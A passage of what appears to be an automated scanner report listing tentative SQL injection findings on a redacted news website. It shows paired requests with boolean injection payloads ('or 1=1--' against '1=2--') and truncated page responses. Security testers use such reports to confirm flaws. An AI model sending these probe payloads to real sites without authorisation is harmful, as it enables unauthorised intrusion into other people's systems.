Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41323843/ns/world_news-mideastn_africa25334761'%20or%201%3d1--%20/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 02:04:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 189208


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:129150931 -->
<title>Egyptians defiant as street battles persist - World news - Mideast/N. Africa - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41323843/ns/world_news-mideast/n_africa/" property="og:url" /><meta content="2011-01-30T01:45:57" property="og:updated" /><meta content="Egyptians defiant as street battles persist - World news - Mideast/N. Africa - msnbc.com" name="title" /><meta content="Egyptians defiant as street battles persist" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="NBC, msnbc.com and news services" property="og:publisher" /><meta content="Hosni Mubarak, Egypt, Government, Egypt, Article, World News, Politics, science, Africa, d" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110129/nn_engel_egypt_110129.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Components/Video/110129/nn_engel_egypt_110129.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="Looted stores, torched cars and the stench of blazing tires filled the streets of Cairo early on Sunday as clashes persisted between police and protesters seeking to drive President Hosni Mubarak from power." name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 01:45:57 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41323843/ns/world_news-mideast/n_africa/" />
<link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets4d.msnbc.redacted/rendering/msnb
...[SNIP]...

Request 2

GET /id/41323843/ns/world_news-mideastn_africa25334761'%20or%201%3d2--%20/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 02:04:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 189393


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847506 -->
<title>Egyptians defiant as street battles persist - World news - Mideast/N. Africa - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41323843/ns/world_news-mideast/n_africa/" property="og:url" /><meta content="2011-01-30T01:45:57" property="og:updated" /><meta content="Egyptians defiant as street battles persist - World news - Mideast/N. Africa - msnbc.com" name="title" /><meta content="Egyptians defiant as street battles persist" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="NBC, msnbc.com and news services" property="og:publisher" /><meta content="Hosni Mubarak, Egypt, Government, Egypt, Article, World News, Politics, science, Africa, d" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110129/nn_engel_egypt_110129.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Components/Video/110129/nn_engel_egypt_110129.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="Looted stores, torched cars and the stench of blazing tires filled the streets of Cairo early on Sunday as clashes persisted between police and protesters seeking to drive President Hosni Mubarak from power." name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 01:45:57 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41323843/ns/world_news-mideast/n_africa/" />
<link href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets1a.msnbc.redacted/rendering/ms
...[SNIP]...

1.116. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41324344/ns/world_news-south_and_central_asia/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41324344%20and%201%3d1--%20/ns/world_news-south_and_central_asia/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 72902


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847510 -->
<title>U.S. demands release of diplomat who killed 2 - World news - South and Central Asia - Pakistan - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/" property="og:url" /><meta content="2011-01-29T12:42:15" property="og:updated" /><meta content="U.S. demands release of diplomat who killed 2 - World news - South and Central Asia - Pakistan - msnbc.com" name="title" /><meta content="U.S. demands release of diplomat who killed 2" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Pakistan, World News, Pakistan, US, Asia, Embassies, Violent crime, Diplomacy, Crime, General news, International relations, Government and politics, Article, u, AP" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110128/x_lon_pakshoot_110128.jpg" name="Search.Image" /><meta content="http://msnbcmedia1.redacted/j/MSNBC/Components/Video/110128/x_lon_pakshoot_110128.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="The United States demanded the immediate release of an American diplomat arrested in the shooting deaths of two Pakistan men, saying Saturday that the man had immunity from prosecution." name="description" property="og:description" /><meta content="Sat, 29 Jan 2011 12:42:15 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/" />
<link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link
...[SNIP]...

Request 2

GET /id/41324344%20and%201%3d2--%20/ns/world_news-south_and_central_asia/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:55:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 72882


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1033648484 -->
<title>U.S. demands release of diplomat who killed 2 - World news - South and Central Asia - Pakistan - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/" property="og:url" /><meta content="2011-01-29T12:42:15" property="og:updated" /><meta content="U.S. demands release of diplomat who killed 2 - World news - South and Central Asia - Pakistan - msnbc.com" name="title" /><meta content="U.S. demands release of diplomat who killed 2" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Pakistan, World News, Pakistan, US, Asia, Embassies, Violent crime, Diplomacy, Crime, General news, International relations, Government and politics, Article, u, AP" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110128/x_lon_pakshoot_110128.jpg" name="Search.Image" /><meta content="http://msnbcmedia1.redacted/j/MSNBC/Components/Video/110128/x_lon_pakshoot_110128.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="The United States demanded the immediate release of an American diplomat arrested in the shooting deaths of two Pakistan men, saying Saturday that the man had immunity from prosecution." name="description" property="og:description" /><meta content="Sat, 29 Jan 2011 12:42:15 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/" />
<link href="http://assets1c.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link
...[SNIP]...

1.117. http://www.msnbc.redacted/id/41326456/ns/business-media_biz/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41326456/ns/business-media_biz/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41326456/ns/business-media_biz/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:57:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 62522


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:1695234872 -->
<title>Comcast takes control of NBC Universal - Business - Media biz - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41326456/ns/business-media_biz/" property="og:url" /><meta content="2011-01-29T16:46:09" property="og:updated" /><meta content="Comcast takes control of NBC Universal - Business - Media biz - msnbc.com" name="title" /><meta content="Comcast takes control of NBC Universal " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Comcast, Cable television, U.S. News, Business, Entertainment, US, Article, Entertainment &amp; Leisure, Telecom, Manufacturing, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="Comcast, the nation's largest cable TV company, has acquired a majority stake in NBC Universal, the owner of the fourth-ranked NBC broadcast network, a bevy of cable channels and the Universal Pictures movie studio." name="description" property="og:description" /><meta content="Sat, 29 Jan 2011 16:46:09 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41326456/ns/business-media_biz/" />
<link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets2d.msnbc.redacted/rendering/msnbc/html40/assets/Css/merged.css?h=17CF5C5EA14EA3836B5DF45A7CFE7AA8"/>

<!--[if lte IE 7]>
<link type="text/css" rel="stylesheet" media="screen" href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/site_ie.css" />
<![endif
...[SNIP]...

Request 2

GET /id/41326456/ns/business-media_biz/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 01:57:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 62578


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847510 -->
<title>Comcast takes control of NBC Universal - Business - Media biz - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41326456/ns/business-media_biz/" property="og:url" /><meta content="2011-01-29T16:46:09" property="og:updated" /><meta content="Comcast takes control of NBC Universal - Business - Media biz - msnbc.com" name="title" /><meta content="Comcast takes control of NBC Universal " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Comcast, Cable television, U.S. News, Business, Entertainment, US, Article, Entertainment &amp; Leisure, Telecom, Manufacturing, LowPri, r, AP" name="keywords" property="og:tags" /><meta content="23294612872" property="fb:page_id" /><meta content="Comcast, the nation's largest cable TV company, has acquired a majority stake in NBC Universal, the owner of the fourth-ranked NBC broadcast network, a bevy of cable channels and the Universal Pictures movie studio." name="description" property="og:description" /><meta content="Sat, 29 Jan 2011 16:46:09 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41326456/ns/business-media_biz/" />
<link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>

<link rel="stylesheet" type="text/css" href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/Css/merged.css?h=17CF5C5EA14EA3836B5DF45A7CFE7AA8"/>

<!--[if lte IE 7]>
<link type="text/css" rel="stylesheet" media="screen" href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/site_ie.css" />
<![endi
...[SNIP]...

1.118. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41326705/ns/world_news-south_and_central_asia/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 22723550%20or%201%3d1--%20 and 22723550%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41326705/ns/world_news-south_and_central_asia/?122723550%20or%201%3d1--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:07:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60198


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<img alt="Image: Members of the Afghan parliament congratulate each other after an inauguration ceremony in Kabul" src="http://msnbcmedia3.redacted/j/MSNBC/Components/Photo/_new/110126-afghan-hmed-240a.thumb-s.jpg" width="60" height="40" />
</li>


</ul>

        <h6>

<span class="label">Next story in Afghanistan</span>
<a href="http://www.msnbc.redacted/id/41269044/ns/world_news-south_and_central_asia/" title="View next story">
Afghan president inaugurates new parliament
</a>
</h6>
</li>
<li class="label">
<span class="nib hide"></span>
<a href="#slice-3"
title="Jump to related">

<span class="icon">
   <span class="related"></span>
   
</span>related
</a>
</li>
</ul>
</li>
</ol>
<ul class="extshare hlist">
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/"></a>

</li>
<li class="fbshare">

<fb:like href="http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/" layout="button_count" width="95" ref="story_header" action="recommend" font="arial"></fb:like>
</li>
</ul>
</div>
<div class="ads">

<div data="field:PrimaryAd;typeName:any;size:adX1;" class="ad adX1">

<div class="ad-label"><a href="http://www.msnbc.redacted/id/31066137/media-kit/" class="mediakit">Advertise</a> | <a href="http://g.redacted/AIPRIV/en-us" class="adchoices">AdChoices</a></div>

</div>

</div>
</div>
<div id="slice-1" name="text" class="i1 slice t-TextSlice text media-image entry-content ">

<div id="mainart" class="hmedia art grid-6x2 " about="http://msnbcmedia4.redacted/j/reuters/2011-01-29
...[SNIP]...

Request 2

GET /id/41326705/ns/world_news-south_and_central_asia/?122723550%20or%201%3d2--%20=1 HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:07:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 60086


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<img alt="" src="http://msnbcmedia4.redacted/j/ap/afghanistan explosion--304104217_v2.thumb-s.jpg" width="60" height="41" />
</li>


</ul>

        <h6>

<span class="label">Next story in Afghanistan</span>
<a href="http://www.msnbc.redacted/id/41312204/ns/world_news-south_and_central_asia/" title="View next story">
Taliban: Deadly store blast targeted Xe worker
</a>
</h6>
</li>
<li class="label">
<span class="nib hide"></span>
<a href="#slice-3"
title="Jump to related">

<span class="icon">
   <span class="related"></span>
   
</span>related
</a>
</li>
</ul>
</li>
</ol>
<ul class="extshare hlist">
<li class="twshare">

<a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews" data-url="http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/"></a>

</li>
<li class="fbshare">

<fb:like href="http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/" layout="button_count" width="95" ref="story_header" action="recommend" font="arial"></fb:like>
</li>
</ul>
</div>
<div class="ads">

<div data="field:PrimaryAd;typeName:any;size:adX1;" class="ad adX1">

<div class="ad-label"><a href="http://www.msnbc.redacted/id/31066137/media-kit/" class="mediakit">Advertise</a> | <a href="http://g.redacted/AIPRIV/en-us" class="adchoices">AdChoices</a></div>

</div>

</div>
</div>
<div id="slice-1" name="text" class="i1 slice t-TextSlice text media-image entry-content ">

<div id="mainart" class="hmedia art grid-6x2 " about="http://msnbcmedia4.redacted/j/reuters/2011-01-29t112321z_01_btre70s0o8f00_rtroptp_3_afghanistan-kandahar.grid-6x2.jpg">
<div class="img"
rel="med
...[SNIP]...

1.119. http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41327238/ns/us_news-crime_and_courts/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /id/41327238/ns'%20and%201%3d1--%20/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:11:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 64654


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:-1075847499 -->
<title>Mom charged in kids' slayings treated at hospital - U.S. news - Crime & courts - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/" property="og:url" /><meta content="2011-01-30T00:08:46" property="og:updated" /><meta content="Mom charged in kids' slayings treated at hospital - U.S. news - Crime &amp; courts - msnbc.com" name="title" /><meta content="Mom charged in kids' slayings treated at hospital" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="TAMARA LUSH" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Julie Powers Schenecker, Tampa, Florida, U.S. News, Florida, US, Crime, Violent crime, General news, Article, r, AP" name="keywords" property="og:tags" /><meta content="/ap/tampa%20teens%20shot--1273670434_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia2.redacted/j/ap/tampa teens shot--1273670434_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="The army officer's wife who authorities say killed her teenage daughter and son because she was fed up with them talking back did not appear in court Saturday because she's being treated at a hospital for an unknown condition. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 00:08:46 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/" />
<link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-tou
...[SNIP]...

Request 2

GET /id/41327238/ns'%20and%201%3d2--%20/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sun, 30 Jan 2011 03:11:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 64599


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<!-- RA:129150931 -->
<title>Mom charged in kids' slayings treated at hospital - U.S. news - Crime & courts - msnbc.com</title>

<meta name="generator" content="SkyPad Rendering" />
<meta content="text/html; charset=UTF-8" http-equiv="content-type"/>
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<meta name="viewport" content="width = 1020"/>
<meta content="http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/" property="og:url" /><meta content="2011-01-30T00:08:46" property="og:updated" /><meta content="Mom charged in kids' slayings treated at hospital - U.S. news - Crime &amp; courts - msnbc.com" name="title" /><meta content="Mom charged in kids' slayings treated at hospital" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="TAMARA LUSH" property="og:author" /><meta content="The Associated Press" property="og:publisher" /><meta content="Julie Powers Schenecker, Tampa, Florida, U.S. News, Florida, US, Crime, Violent crime, General news, Article, r, AP" name="keywords" property="og:tags" /><meta content="/ap/tampa%20teens%20shot--1273670434_v2.jpg" name="Search.Image" /><meta content="http://msnbcmedia2.redacted/j/ap/tampa teens shot--1273670434_v2.standard.jpg" property="og:image" /><meta content="AP" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="The army officer's wife who authorities say killed her teenage daughter and son because she was fed up with them talking back did not appear in court Saturday because she's being treated at a hospital for an unknown condition. " name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 00:08:46 GMT" name="Search.Update" />
<link rel="canonical" href="http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/" />
<link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch
...[SNIP]...

1.120. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.msnbc.redacted
Path:   /id/41327817/ns/world_news-mideastn_africa/

Issue detail

